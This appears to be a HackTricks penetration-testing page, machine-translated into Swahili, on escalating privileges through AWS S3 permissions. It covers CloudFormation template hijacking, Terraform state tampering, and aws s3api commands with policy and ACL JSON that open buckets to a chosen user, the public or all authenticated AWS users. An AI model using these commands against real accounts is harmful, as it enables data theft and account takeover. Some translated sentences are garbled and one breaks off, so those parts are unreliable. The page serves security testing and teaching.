6.7 KiB
AWS - S3 Privesc
{{#include ../../../banners/hacktricks-training.md}}
S3
s3:PutBucketNotification, s3:PutObject, s3:GetObject
Mshambuliaji mwenye ruhusa hizo juu ya ndoo za kuvutia anaweza kuwa na uwezo wa kuiba rasilimali na kupandisha mamlaka.
Kwa mfano, mshambuliaji mwenye ruhusa hizo juu ya ndoo ya cloudformation inayoitwa "cf-templates-nohnwfax6a6i-us-east-1" ataweza kuiba utekelezaji. Ufikiaji unaweza kutolewa kwa sera ifuatayo:
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"s3:PutBucketNotification",
"s3:GetBucketNotification",
"s3:PutObject",
"s3:GetObject"
],
"Resource": [
"arn:aws:s3:::cf-templates-*/*",
"arn:aws:s3:::cf-templates-*"
]
},
{
"Effect": "Allow",
"Action": "s3:ListAllMyBuckets",
"Resource": "*"
}
]
}
Na hijack inapatikana kwa sababu kuna dirisha dogo la muda kutoka wakati template inapoupoload kwenye bucket hadi wakati template inatekelezwa. Mshambuliaji anaweza tu kuunda lambda function katika akaunti yake ambayo it itachochewa wakati arifa ya bucket itatumwa, na hijacks maudhui ya bucket hiyo.
.png)
Moduli ya Pacu cfn__resouce_injection inaweza kutumika kuendesha shambulio hili.
Kwa maelezo zaidi angalia utafiti wa asili: https://rhinosecuritylabs.com/aws/cloud-malware-cloudformation-injection/
s3:PutObject, s3:GetObject
Hizi ni ruhusa za kupata na kupakia vitu kwenye S3. Huduma kadhaa ndani ya AWS (na nje yake) hutumia hifadhi ya S3 kuhifadhi faili za usanidi.
Mshambuliaji mwenye ufikiaji wa kusoma anaweza kupata taarifa nyeti kwenye hizo.
Mshambuliaji mwenye ufikiaji wa kuandika anaweza kubadilisha data ili kutumia huduma fulani na kujaribu kupandisha mamlaka.
Hizi ni baadhi ya mifano:
- Ikiwa mfano wa EC2 unahifadhi data za mtumiaji kwenye bucket ya S3, mshambuliaji anaweza kuibadilisha ili kutekeleza msimbo wowote ndani ya mfano wa EC2.
s3:PutObject, s3:GetObject (hiari) juu ya faili ya hali ya terraform
Ni kawaida sana kwamba faili za terraform za hali zinahifadhiwa kwenye hifadhi ya blob ya watoa huduma wa wingu, e.g. AWS S3. Kiambishi cha faili kwa faili ya hali ni .tfstate, na majina ya bucket mara nyingi pia yanaonyesha kuwa yana faili za hali za terraform. Kawaida, kila akaunti ya AWS ina bucket moja kama hiyo kuhifadhi faili za hali zinazoonyesha hali ya akaunti.
Pia kawaida, katika akaunti za ulimwengu halisi karibu kila wakati watengenezaji wote wana s3:* na wakati mwingine hata watumiaji wa biashara wana s3:Put*.
Hivyo, ikiwa una ruhusa zilizoorodheshwa juu ya faili hizi, kuna vector ya shambulio inayokuruhusu kupata RCE katika pipeline kwa mamlaka ya terraform - wakati mwingi AdministratorAccess, ikifanya wewe kuwa admin wa akaunti ya wingu. Pia, unaweza kutumia vector hiyo kufanya shambulio la kukataa huduma kwa kufanya terraform ifute rasilimali halali.
Fuata maelezo katika sehemu ya Kunyanyasa Faili za Hali za Terraform ya ukurasa wa Usalama wa Terraform kwa msimbo wa matumizi moja kwa moja:
{{#ref}} terraform-security.md#abusing-terraform-state-files {{#endref}}
s3:PutBucketPolicy
Mshambuliaji, ambaye anahitaji kuwa kutoka akaunti hiyo hiyo, ikiwa sivyo kosa Njia iliyoainishwa hairuhusiwi itachochewa, kwa ruhusa hii atakuwa na uwezo wa kujipa ruhusa zaidi juu ya bucket(s) akimruhusu kusoma, kuandika, kubadilisha, kufuta na kufichua buckets.
# Update Bucket policy
aws s3api put-bucket-policy --policy file:///root/policy.json --bucket <bucket-name>
## JSON giving permissions to a user and mantaining some previous root access
{
"Id": "Policy1568185116930",
"Version":"2012-10-17",
"Statement":[
{
"Effect":"Allow",
"Principal":{
"AWS":"arn:aws:iam::123123123123:root"
},
"Action":"s3:ListBucket",
"Resource":"arn:aws:s3:::somebucketname"
},
{
"Effect":"Allow",
"Principal":{
"AWS":"arn:aws:iam::123123123123:user/username"
},
"Action":"s3:*",
"Resource":"arn:aws:s3:::somebucketname/*"
}
]
}
## JSON Public policy example
### IF THE S3 BUCKET IS PROTECTED FROM BEING PUBLICLY EXPOSED, THIS WILL THROW AN ACCESS DENIED EVEN IF YOU HAVE ENOUGH PERMISSIONS
{
"Id": "Policy1568185116930",
"Version": "2012-10-17",
"Statement": [
{
"Sid": "Stmt1568184932403",
"Action": [
"s3:ListBucket"
],
"Effect": "Allow",
"Resource": "arn:aws:s3:::welcome",
"Principal": "*"
},
{
"Sid": "Stmt1568185007451",
"Action": [
"s3:GetObject"
],
"Effect": "Allow",
"Resource": "arn:aws:s3:::welcome/*",
"Principal": "*"
}
]
}
s3:GetBucketAcl, s3:PutBucketAcl
Mshambuliaji anaweza kutumia ruhusa hizi kumpatia ufikiaji zaidi juu ya makundi maalum.
Kumbuka kwamba mshambuliaji hatahitaji kuwa kutoka kwenye akaunti ile ile. Zaidi ya hayo, ufikiaji wa kuandika
# Update bucket ACL
aws s3api get-bucket-acl --bucket <bucket-name>
aws s3api put-bucket-acl --bucket <bucket-name> --access-control-policy file://acl.json
##JSON ACL example
## Make sure to modify the Owner’s displayName and ID according to the Object ACL you retrieved.
{
"Owner": {
"DisplayName": "<DisplayName>",
"ID": "<ID>"
},
"Grants": [
{
"Grantee": {
"Type": "Group",
"URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"
},
"Permission": "FULL_CONTROL"
}
]
}
## An ACL should give you the permission WRITE_ACP to be able to put a new ACL
s3:GetObjectAcl, s3:PutObjectAcl
Mshambuliaji anaweza kutumia ruhusa hizi kuwapa ufikiaji zaidi juu ya vitu maalum ndani ya mifuko.
# Update bucket object ACL
aws s3api get-object-acl --bucket <bucekt-name> --key flag
aws s3api put-object-acl --bucket <bucket-name> --key flag --access-control-policy file://objacl.json
##JSON ACL example
## Make sure to modify the Owner’s displayName and ID according to the Object ACL you retrieved.
{
"Owner": {
"DisplayName": "<DisplayName>",
"ID": "<ID>"
},
"Grants": [
{
"Grantee": {
"Type": "Group",
"URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"
},
"Permission": "FULL_CONTROL"
}
]
}
## An ACL should give you the permission WRITE_ACP to be able to put a new ACL
s3:GetObjectAcl, s3:PutObjectVersionAcl
Mshambuliaji mwenye haki hizi anatarajiwa kuwa na uwezo wa kuweka Acl kwa toleo maalum la kitu.
aws s3api get-object-acl --bucket <bucekt-name> --key flag
aws s3api put-object-acl --bucket <bucket-name> --key flag --version-id <value> --access-control-policy file://objacl.json
{{#include ../../../banners/hacktricks-training.md}}